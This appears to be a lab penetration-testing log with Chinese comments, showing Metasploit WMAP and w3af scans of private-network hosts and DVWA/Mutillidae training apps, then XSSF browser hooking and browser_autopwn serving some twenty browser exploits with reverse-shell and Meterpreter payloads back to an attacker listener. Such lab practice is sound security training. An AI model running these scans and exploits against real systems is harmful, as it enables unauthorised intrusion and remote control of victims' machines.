.-.-.-..-.-.-..---..---. | | | || | | || | || |-' `-----'`-'-'-'`-^-'`-' [WMAP 1.5.1] === et [ ] metasploit.com 2012 [*] Successfully loaded plugin: wmap msf5 > wmap_sites [*] Usage: wmap_sites [options] -h Display this help text -a [url] Add site (vhost,url) -d [ids] Delete sites (separate ids with space) -l List all available sites -s [id] Display site structure (vhost,url|ids) (level) (unicode output true/false) msf5 > wmap_sites -a 10.10.10.129 [*] Site created. msf5 > wmap_sites -a 10.10.10.130 [*] Site created. msf5 > wmap_sites -a 10.10.10.254 [*] Site created. msf5 > wmap_sites -l [*] Available sites =============== Id Host Vhost Port Proto # Pages # Forms -- ---- ----- ---- ----- ------- ------- 0 10.10.10.129 10.10.10.129 80 http 0 0 1 10.10.10.130 10.10.10.130 80 http 0 0 2 10.10.10.254 10.10.10.254 80 http 0 0 msf5 > wmap_targets -d 0 [*] Loading 10.10.10.129,http://10.10.10.129:80/. msf5 > wmap_run [*] Usage: wmap_run [options] -h Display this help text -t Show all enabled modules -m [regex] Launch only modules that name match provided regex. -p [regex] Only test path defined by regex. -e [/path/to/profile] Launch profile modules against all matched targets. (No profile file runs all enabled modules.) # 查看哪些模块将会在扫描中使用 msf5 > wmap_run -t [*] Testing target: [*] Site: 10.10.10.129 (10.10.10.129) [*] Port: 80 SSL: false ============================================================ [*] Testing started. 2019-02-07 14:30:31 +0800 [*] Loading wmap modules... [*] 39 wmap enabled modules loaded. [*] =[ SSL testing ]= ============================================================ [*] Target is not SSL. SSL modules disabled. [*] =[ Web Server testing ]= ============================================================ [*] Module auxiliary/scanner/http/http_version [*] Module auxiliary/scanner/http/open_proxy [*] Module auxiliary/admin/http/tomcat_administration [*] Module auxiliary/admin/http/tomcat_utf8_traversal [*] Module auxiliary/scanner/http/drupal_views_user_enum [*] Module auxiliary/scanner/http/frontpage_login [*] Module auxiliary/scanner/http/host_header_injection [*] Module auxiliary/scanner/http/options [*] Module auxiliary/scanner/http/robots_txt [*] Module auxiliary/scanner/http/scraper [*] Module auxiliary/scanner/http/svn_scanner [*] Module auxiliary/scanner/http/trace [*] Module auxiliary/scanner/http/vhost_scanner [*] Module auxiliary/scanner/http/webdav_internal_ip [*] Module auxiliary/scanner/http/webdav_scanner [*] Module auxiliary/scanner/http/webdav_website_content [*] =[ File/Dir testing ]= ============================================================ [*] Module auxiliary/scanner/http/backup_file [*] Module auxiliary/scanner/http/brute_dirs [*] Module auxiliary/scanner/http/copy_of_file [*] Module auxiliary/scanner/http/dir_listing [*] Module auxiliary/scanner/http/dir_scanner [*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass [*] Module auxiliary/scanner/http/file_same_name_dir [*] Module auxiliary/scanner/http/files_dir [*] Module auxiliary/scanner/http/http_put [*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass [*] Module auxiliary/scanner/http/prev_dir_same_name_file [*] Module auxiliary/scanner/http/replace_ext [*] Module auxiliary/scanner/http/soap_xml [*] Module auxiliary/scanner/http/trace_axd [*] Module auxiliary/scanner/http/verb_auth_bypass [*] =[ Unique Query testing ]= ============================================================ [*] Module auxiliary/scanner/http/blind_sql_query [*] Module auxiliary/scanner/http/error_sql_injection [*] Module auxiliary/scanner/http/http_traversal [*] Module auxiliary/scanner/http/rails_mass_assignment [*] Module exploit/multi/http/lcms_php_exec [*] =[ Query testing ]= ============================================================ [*] =[ General testing ]= ============================================================ [*] Done. # 查看扫描结果并进行攻击 msf5 > wmap_run -e [*] Using ALL wmap enabled modules. [-] NO WMAP NODES DEFINED. Executing local modules [*] Testing target: [*] Site: 10.10.10.129 (10.10.10.129) [*] Port: 80 SSL: false ============================================================ [*] Testing started. 2019-02-07 14:47:50 +0800 [*] =[ SSL testing ]= ============================================================ [*] Target is not SSL. SSL modules disabled. [*] =[ Web Server testing ]= ============================================================ [*] Module auxiliary/scanner/http/http_version [+] 10.10.10.129:80 Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1 [*] Module auxiliary/scanner/http/open_proxy [*] Module auxiliary/admin/http/tomcat_administration [*] Module auxiliary/admin/http/tomcat_utf8_traversal [*] Attempting to connect to 10.10.10.129:80 [+] No File(s) found [*] Module auxiliary/scanner/http/drupal_views_user_enum [-] 10.10.10.129 does not appear to be vulnerable, will not continue [*] Module auxiliary/scanner/http/frontpage_login [*] 10.10.10.129:80 - http://10.10.10.129/ may not support FrontPage Server Extensions [*] Module auxiliary/scanner/http/host_header_injection [*] Module auxiliary/scanner/http/options [+] 10.10.10.129 allows GET,HEAD,POST,OPTIONS,TRACE methods [+] 10.10.10.129:80 - TRACE method allowed. [*] Module auxiliary/scanner/http/robots_txt [*] [10.10.10.129] /robots.txt found [+] Contents of Robots.txt: User-agent: * Disallow: /administrator/ Disallow: /cache/ Disallow: /components/ Disallow: /images/ Disallow: /includes/ Disallow: /installation/ Disallow: /language/ Disallow: /libraries/ Disallow: /media/ Disallow: /modules/ Disallow: /plugins/ Disallow: /templates/ Disallow: /tmp/ Disallow: /xmlrpc/ [*] Module auxiliary/scanner/http/scraper [+] [10.10.10.129] / [Free CSS template by ChocoTemplates.com] [*] Module auxiliary/scanner/http/svn_scanner [*] Using code '404' as not found. [+] [10.10.10.129:80] SVN Entries file found. [-] [10.10.10.129] Version 0 not supported [*] Module auxiliary/scanner/http/trace [+] 10.10.10.129:80 is vulnerable to Cross-Site Tracing [-] Auxiliary failed: NoMethodError undefined method `id'for nil:NilClass [-] Call stack: [-] /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:295:in `report_vuln' [-] /usr/share/metasploit-framework/modules/auxiliary/scanner/http/trace.rb:47:in `run_host' [-] /usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:111:in `block (2 levels) in run' [-] /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:106:in `block in spawn' [*] Module auxiliary/scanner/http/vhost_scanner [*] >> Exception during launch from auxiliary/scanner/http/vhost_scanner: The following options failed to validate: DOMAIN. [*] Module auxiliary/scanner/http/webdav_internal_ip [*] Module auxiliary/scanner/http/webdav_scanner [*] 10.10.10.129 (Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1) WebDAV disabled. [*] Module auxiliary/scanner/http/webdav_website_content [*] =[ File/Dir testing ]= ============================================================ [*] Module auxiliary/scanner/http/backup_file [*] Module auxiliary/scanner/http/brute_dirs [*] Path: / [*] Using code '404' as not found. [+] Found http://10.10.10.129:80/js/ 200 [+] Found http://10.10.10.129:80/op/ 200 [+] Found http://10.10.10.129:80/css/ 200 [+] Found http://10.10.10.129:80/doc/ 403 [+] Found http://10.10.10.129:80/ops/ 200 [+] Found http://10.10.10.129:80/tmp/ 200 [*] Module auxiliary/scanner/http/copy_of_file [*] Module auxiliary/scanner/http/dir_listing [*] Path: / [*] Module auxiliary/scanner/http/dir_scanner [*] Path: / [*] Detecting error code [*] Using code '404' as not found for 10.10.10.129 [+] Found http://10.10.10.129:80/1111/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/11/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/3/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/1/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/123321/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/1337/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/123/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/00001/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/001/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/0/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/0001/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/111/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/04/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/10/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/2/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/007/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/1000/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/123123/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/4/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/8/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/777/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/6/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/606/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/9/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/7/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/911911/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/666/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/5/ 503 (10.10.10.129) [+] Found http://10.10.10.129:80/CHANGELOG/ 200 (10.10.10.129) [+] Found http://10.10.10.129:80/LICENSE/ 200 (10.10.10.129) [+] Found http://10.10.10.129:80/administrator/ 302 (10.10.10.129) [+] Found http://10.10.10.129:80/cache/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/cgi-bin/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/components/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/css/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/doc/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/f/ 200 (10.10.10.129) [+] Found http://10.10.10.129:80/gallery2/ 302 (10.10.10.129) [+] Found http://10.10.10.129:80/ghost/ 200 (10.10.10.129) [+] Found http://10.10.10.129:80/icons/ 200 (10.10.10.129) [+] Found http://10.10.10.129:80/images/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/includes/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/installation/ 200 (10.10.10.129) [+] Found http://10.10.10.129:80/javascript/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/js/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/language/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/libraries/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/login/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/logs/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/media/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/modules/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/phpBB2/ 200 (10.10.10.129) [+] Found http://10.10.10.129:80/plugins/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/phpmyadmin/ 200 (10.10.10.129) [+] Found http://10.10.10.129:80/templates/ 404 (10.10.10.129) [+] Found http://10.10.10.129:80/tmp/ 404 (10.10.10.129) [*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass [*] Path: / [*] Using code '404' as not found. [*] Module auxiliary/scanner/http/file_same_name_dir [*] Path: / [-] Blank or default PATH set. [*] Module auxiliary/scanner/http/files_dir [*] Path: / [*] Using code '404' as not found for files with extension .null [*] Using code '404' as not found for files with extension .backup [*] Using code '404' as not found for files with extension .bak [*] Using code '404' as not found for files with extension .c [*] Using code '404' as not found for files with extension .cfg [*] Using code '404' as not found for files with extension .class [*] Using code '404' as not found for files with extension .copy [*] Using code '404' as not found for files with extension .conf [*] Using code '404' as not found for files with extension .exe [*] Using code '404' as not found for files with extension .html [+] Found http://10.10.10.129:80/index.html 200 [+] Found http://10.10.10.129:80/index2.html 200 [+] Found http://10.10.10.129:80/signin.html 200 [*] Using code '404' as not found for files with extension .htm [*] Using code '404' as not found for files with extension .ini [*] Using code '404' as not found for files with extension .log [*] Using code '404' as not found for files with extension .old [*] Using code '404' as not found for files with extension .orig [*] Using code '404' as not found for files with extension .php [+] Found http://10.10.10.129:80/index.php 302 [+] Found http://10.10.10.129:80/index2.php 302 [+] Found http://10.10.10.129:80/login.php 500 [+] Found http://10.10.10.129:80/signin.php 500 [*] Using code '404' as not found for files with extension .tar [*] Using code '404' as not found for files with extension .tar.gz [*] Using code '404' as not found for files with extension .tgz [*] Using code '404' as not found for files with extension .tmp [*] Using code '404' as not found for files with extension .temp [*] Using code '404' as not found for files with extension .txt [*] Using code '404' as not found for files with extension .zip [*] Using code '404' as not found for files with extension ~ [*] Using code '404' as not found for files with extension [+] Found http://10.10.10.129:80/administrator 301 [+] Found http://10.10.10.129:80/cache 301 [+] Found http://10.10.10.129:80/cgi-bin 301 [+] Found http://10.10.10.129:80/contact 200 [+] Found http://10.10.10.129:80/css 301 [+] Found http://10.10.10.129:80/images 301 [+] Found http://10.10.10.129:80/includes 301 [+] Found http://10.10.10.129:80/installation 301 [+] Found http://10.10.10.129:80/index 200 [+] Found http://10.10.10.129:80/index2 302 [+] Found http://10.10.10.129:80/javascript 301 [+] Found http://10.10.10.129:80/js 301 [+] Found http://10.10.10.129:80/login 500 [+] Found http://10.10.10.129:80/libraries 301 [+] Found http://10.10.10.129:80/logs 301 [+] Found http://10.10.10.129:80/modules 301 [+] Found http://10.10.10.129:80/phpmyadmin 301 [+] Found http://10.10.10.129:80/signin 200 [+] Found http://10.10.10.129:80/templates 301 [+] Found http://10.10.10.129:80/tmp 301 [+] Found http://10.10.10.129:80/xmlrpc 301 [*] Using code '404' as not found for files with extension [+] Found http://10.10.10.129:80/administrator 301 [+] Found http://10.10.10.129:80/cache 301 [+] Found http://10.10.10.129:80/cgi-bin 301 [+] Found http://10.10.10.129:80/contact 200 [+] Found http://10.10.10.129:80/css 301 [+] Found http://10.10.10.129:80/images 301 [+] Found http://10.10.10.129:80/includes 301 [+] Found http://10.10.10.129:80/index 200 [+] Found http://10.10.10.129:80/installation 301 [+] Found http://10.10.10.129:80/index2 302 [+] Found http://10.10.10.129:80/javascript 301 [+] Found http://10.10.10.129:80/js 301 [+] Found http://10.10.10.129:80/libraries 301 [+] Found http://10.10.10.129:80/login 500 [+] Found http://10.10.10.129:80/logs 301 [+] Found http://10.10.10.129:80/modules 301 [+] Found http://10.10.10.129:80/phpmyadmin 301 [+] Found http://10.10.10.129:80/signin 200 [+] Found http://10.10.10.129:80/templates 301 [+] Found http://10.10.10.129:80/tmp 301 [+] Found http://10.10.10.129:80/xmlrpc 301 [*] Module auxiliary/scanner/http/http_put [*] Path: / [-] 10.10.10.129: File doesn't seem to exist. The upload probably failed [*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass [*] Path: / [-] 10.10.10.129:80 Folder does not require authentication. [405] [*] Module auxiliary/scanner/http/prev_dir_same_name_file [*] Path: / [-] Blank or default PATH set. [*] Module auxiliary/scanner/http/replace_ext [*] Module auxiliary/scanner/http/soap_xml [*] Path: / [*] Starting scan with 0ms delay between requests [*] Server 10.10.10.129:80 returned HTTP 404 for /. Use a different one. [*] Module auxiliary/scanner/http/trace_axd [*] Path: / [*] Module auxiliary/scanner/http/verb_auth_bypass [*] =[ Unique Query testing ]= ============================================================ [*] Module auxiliary/scanner/http/blind_sql_query [*] Module auxiliary/scanner/http/error_sql_injection [*] Module auxiliary/scanner/http/http_traversal [*] Module auxiliary/scanner/http/rails_mass_assignment [*] Module exploit/multi/http/lcms_php_exec [*] =[ Query testing ]= ============================================================ [*] =[ General testing ]= ============================================================ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Launch completed in 778.7549073696136 seconds. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [*] Done. # 查看结果 msf5 > vulns Vulnerabilities =============== Timestamp Host Name References --------- ---- ---- ---------- 2019-02-07 06:49:59 UTC 10.10.10.129 HTTP Trace Method Allowed CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561
w3af>>> plugins w3af/plugins>>> audit xss, sqli w3af/plugins>>> crawl web_spider w3af/plugins>>> crawl config web_spider w3af/plugins/crawl/config:web_spider>>> sethelp keys back exitprint save view w3af/plugins/crawl/config:web_spider>>> set only_forward follow_regex ignore_regex w3af/plugins/crawl/config:web_spider>>> set only_forward true w3af/plugins/crawl/config:web_spider>>> back The configuration has been saved. w3af/plugins>>> output html_file w3af/plugins>>> back w3af>>> target w3af/config:target>>> set target http://www.dvssc.com/dvwa/index.php w3af/config:target>>> back The configuration has been saved. w3af>>> start
# 爬取模块 w3af/plugins>>> crawl web_spider w3af/plugins>>> crawl config web_spider w3af/plugins/crawl/config:web_spider>>> set only_forward true w3af/plugins/crawl/config:web_spider>>> back The configuration has been saved.
# 输出模块 w3af/plugins>>> output html_file w3af/plugins>>> output config html_file w3af/plugins/output/config:html_file>>> set template output_file verbose w3af/plugins/output/config:html_file>>> set verbose true w3af/plugins/output/config:html_file>>> set output_file /root/dvssc_blog.html w3af/plugins/output/config:html_file>>> back The configuration has been saved. w3af/plugins>>> back
# 设定目标 w3af>>> target w3af/config:target>>> sethelp keys back exitprint save view w3af/config:target>>> set target target_os target_framework target w3af/config:target>>> set target http://www.dvssc.com/mutillidae/index.php w3af/config:target>>> back The configuration has been saved.
# 开始扫描 w3af>>> start New URL found by web_spider plugin: "http://www.dvssc.com/mutillidae/index.php" A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=register.php", using HTTP method POST. The sent post-data was: "...user_name=..."which modifies the "user_name" parameter. This vulnerability was found in the request with id 243. A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=view-someones-blog.php", using HTTP method POST. The sent post-data was: "show_only_user=&Submit_button=Submit"which modifies the "show_only_user" parameter. This vulnerability was found in the request with id 255. A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=register.php", using HTTP method POST. The sent post-data was: "...password=..."which modifies the "password" parameter. This vulnerability was found in the request with id 271. Found 1 URLs and 28 different injections points. The URL list is: - http://www.dvssc.com/mutillidae/index.php The list of fuzzable requests is: - Method: GET | http://www.dvssc.com/mutillidae/index.php - Method: GET | http://www.dvssc.com/mutillidae/index.php - Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (do) - Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (do) - Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page) - Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page) - Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page) - Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page) - Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page) - Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page) - Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page) - Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page) - Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page) - Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page) - Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page) - Method: GET | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (page, php_file_name, submit) - Method: POST | http://www.dvssc.com/mutillidae/index.php | Query string: (page) - Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (Submit_button) - Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (show_only_user, Submit_button) - Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (show_only_user, Submit_button) - Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (show_only_user, Submit_button) - Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (target_host, Submit_button) - Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (text_file_name, B1) - Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (text_file_name, B1) - Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (text_file_name, B1) - Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (user_name, password, Submit_button) - Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (user_name, password, password_confirm, Submit_button) - Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (view_user_name, password, Submit_button) A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php", using HTTP method GET. The sent data was: "php_file_name=&page=source-viewer.php&submit=Submit" The modified parameter was "php_file_name". This vulnerability was found in the request with id 384. A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=user-info.php", using HTTP method POST. The sent post-data was: "view_user_name=&password=FrAmE30.&Submit_button=Submit"which modifies the "view_user_name" parameter. This vulnerability was found in the request with id 386. The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:552) The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:553) The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:554) The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:555) The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:557) Scan finished in 1 minute 31 seconds Stopping the core...
# 加载XSSF模块 msf5 > load xssf [-] Your Ruby version is 2.5.3. Make sure your version is up-to-date with the last non-vulnerable version before using XSSF!
INFORMATION ABOUT VICTIM 1 ============================ IP ADDRESS : 10.10.10.254 ACTIVE ? : TRUE FIRST REQUEST : 2019-02-09 22:07:23 LAST REQUEST : 2019-02-09 22:23:53 CONNECTION TIME : 0hr 16min 30sec BROWSER NAME : Internet Explorer BROWSER VERSION : 6.0 OS NAME : Windows OS VERSION : XP ARCHITECTURE : ARCH_X86 LOCATION : http://10.10.10.128:8888 XSSF COOKIE ? : YES RUNNING ATTACK : NONE WAITING ATTACKS : 0
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The IP address to use for reverse-connect payloads SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description ---- ----------- WebServer Start a bunch of modules and direct clients to appropriate exploits
msf5 auxiliary(server/browser_autopwn) > set LHOST 10.10.10.128 LHOST => 10.10.10.128 msf5 auxiliary(server/browser_autopwn) > set SRVHOST 10.10.10.128 SRVHOST => 10.10.10.128 msf5 auxiliary(server/browser_autopwn) > exploit [*] Auxiliary module running as background job 0.
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/UpcSM [*] Server started. [*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp [*] Using URL: http://10.10.10.128:8080/NJNtplVtwKv [*] Server started. [*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp [*] Using URL: http://10.10.10.128:8080/dFOtVUOMPmc [*] Server started. [*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp [*] Using URL: http://10.10.10.128:8080/oQIYImSFPVkT [*] Server started. [*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/STMNDtGOTiANY [*] Server started. [*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/uBrKmGeGJoM [*] Server started. [*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/PHlayF [*] Server started. [*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/btZYRTHW [*] Server started. [*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/MtrrbGqvxBGp [*] Server started. [*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/gqnIrlsGGGL [*] Server started. [*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp [*] Using URL: http://10.10.10.128:8080/qjoHtDYsUA [*] Server started. [*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/VTRsYvyICuI [*] Server started. [*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/nscgcOF [*] Server started. [*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/gcErPNn [*] Server started. [*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/nozikgfm [*] Server started. [*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/doNKZzOvFhj [*] Server started. [*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/hyVgsOceIkWv [*] Server started. [*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp [*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/qDXS [*] Server started. [*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp [*] Using URL: http://10.10.10.128:8080/Zxijin [*] Server started. [*] Starting handler for windows/meterpreter/reverse_tcp on port 3333 [*] Starting handler for generic/shell_reverse_tcp on port 6666 [*] Started reverse TCP handler on 10.10.10.128:3333 [*] Using URL: http://10.10.10.128:8080/aaeoheX [*] Server started. [*] Starting handler for java/meterpreter/reverse_tcp on port 7777 [*] Started reverse TCP handler on 10.10.10.128:6666 [*] Started reverse TCP handler on 10.10.10.128:7777
[*] --- Done, found 20 exploit modules # 共20个可用于攻击的模块
[*] Using URL: http://10.10.10.128:8080/P8ZELlXN4 [*] Server started.
# 查看它们 msf5 auxiliary(server/browser_autopwn) > jobs